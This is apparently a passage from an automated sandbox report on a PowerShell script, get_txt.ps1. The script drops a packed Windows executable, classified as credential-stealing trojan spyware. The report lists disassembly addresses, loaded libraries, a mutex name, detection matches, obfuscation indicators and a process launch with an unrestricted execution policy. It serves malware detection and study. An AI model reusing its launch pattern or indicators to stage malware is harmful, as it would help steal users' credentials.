                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040C5E010_2_0040C5E0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041263710_2_00412637
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041C74210_2_0041C742
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042277010_2_00422770
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042677010_2_00426770
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004047D210_2_004047D2
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043F7F710_2_0043F7F7
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041579F10_2_0041579F
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041D7BF10_2_0041D7BF
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043885010_2_00438850
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042C87010_2_0042C870
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042180010_2_00421800
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004198CE10_2_004198CE
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004128D310_2_004128D3
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041989B10_2_0041989B
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042D94010_2_0042D940
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041A94D10_2_0041A94D
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044195810_2_00441958
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041C96E10_2_0041C96E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043697110_2_00436971
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043291710_2_00432917
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042092F10_2_0042092F
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040CA5010_2_0040CA50
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00410A7610_2_00410A76
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00427A1410_2_00427A14
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042CAD010_2_0042CAD0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00421AE010_2_00421AE0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00447B7010_2_00447B70
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00408B0010_2_00408B00
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00402B3010_2_00402B30
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042EBC010_2_0042EBC0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042EBA610_2_0042EBA6
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00438C1010_2_00438C10
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040ECC010_2_0040ECC0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042ACF410_2_0042ACF4
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00426CA010_2_00426CA0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043AD1010_2_0043AD10
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00437D3510_2_00437D35
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040ADC010_2_0040ADC0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00420DC010_2_00420DC0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00407DE010_2_00407DE0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00434DE310_2_00434DE3
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00446DB910_2_00446DB9
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043FE5010_2_0043FE50
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00443E5010_2_00443E50
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041DE0E10_2_0041DE0E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00421E1010_2_00421E10
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043DE1D10_2_0043DE1D
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00446E3010_2_00446E30
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041AEC510_2_0041AEC5
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00403EF010_2_00403EF0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042BEF310_2_0042BEF3
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00415EB110_2_00415EB1
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00447F6010_2_00447F60
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00408F7010_2_00408F70
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042DF7310_2_0042DF73
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041BF0110_2_0041BF01
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00423F3010_2_00423F30
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00413FCE10_2_00413FCE
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042EFDA10_2_0042EFDA
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02661AD010_2_02661AD0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0266116010_2_02661160
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02657E1010_2_02657E10
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0265F68010_2_0265F680
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0266D73910_2_0266D739
                          Source: C:\Windows\Temp\cmd.exeCode function: String function: 0040B310 appears 41 times
                          Source: C:\Windows\Temp\cmd.exeCode function: String function: 00419060 appears 115 times
                          Source: cmd.exe.0.drStatic PE information: Number of sections : 11 > 10
                          Source: cmd.exe.0.drStatic PE information: Section: iqwrhdu ZLIB complexity 1.021484375
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@5/21@3/4
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004407C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,#2,#2,#8,#9,#6,#6,#6,#6,GetVolumeInformationW,10_2_004407C0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                          Source: C:\Windows\Temp\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\Jawmf49fj49d8rt45toht9e5hy
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aipcn1ic.ate.ps1Jump to behavior
                          Source: Yara matchFile source: 10.0.cmd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.1900062154.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Windows\Temp\cmd.exe, type: DROPPED
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                          Source: cmd.exe, 0000000A.00000003.1936119903.000000000377C000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1936533138.000000000377B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2014067358.000000000378A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2013846577.000000000377D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1936293323.0000000003795000.00000004.00000800.00020000.00000000.sdmp, 091AF3BA01C3CA5E.dat.10.dr, 9AE0A732660712D9.dat.10.dr, FEF0DD79AA87957E.dat.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: get_txt.ps1Virustotal: Detection: 13%
                          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\get_txt.ps1"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Temp\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Windows\Temp\cmd.exeUnpacked PE file: 10.2.cmd.exe.400000.0.unpack
                          Source: cmd.exe.0.drStatic PE information: real checksum: 0x562316 should be: 0x5cd076
                          Source: cmd.exe.0.drStatic PE information: section name: .didata
                          Source: cmd.exe.0.drStatic PE information: section name: iqwrhdu
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_045CD308 push eax; mov dword ptr [esp], edx0_2_045CD31C
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044B599 pushfd ; ret 10_2_0044B5B0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044DA13 push esp; retf 10_2_0044DA1B
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00446A80 push eax; mov dword ptr [esp], F6F1F0C3h10_2_00446A83
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043CF21 push ss; retf 10_2_0043CF27
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268135A push ebx; ret 10_2_0268135B
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02680316 push dword ptr [esp+20h]; retn 0024h10_2_02680342
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026823ED push dword ptr [esp+50h]; retn 0054h10_2_026823F1
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026803CA push dword ptr [esp+1Ch]; retn 0020h10_2_02680394
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268338B push bx; mov dword ptr [esp], eax10_2_0268338D
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02683380 push ebx; mov dword ptr [esp], eax10_2_0268338D
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02680068 push ecx; ret 10_2_026801DD
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268002F push dword ptr [esp+34h]; retn 0038h10_2_02680033
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026828D2 push eax; ret 10_2_02682937
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02682962 push eax; ret 10_2_02682937
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02682971 push dword ptr [esp+2Ch]; retn 0030h10_2_0268296E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02682949 push dword ptr [esp+2Ch]; retn 0030h10_2_0268296E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02680129 push ecx; ret 10_2_02680296
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268292A push eax; ret 10_2_02682937
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268291F push dword ptr [esp+2Ch]; retn 0030h10_2_0268296E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026801E3 push ecx; ret 10_2_026801DD
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026829B6 push dword ptr [esp+2Ch]; retn 0030h10_2_0268296E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268019E push ebx; ret 10_2_026801A1
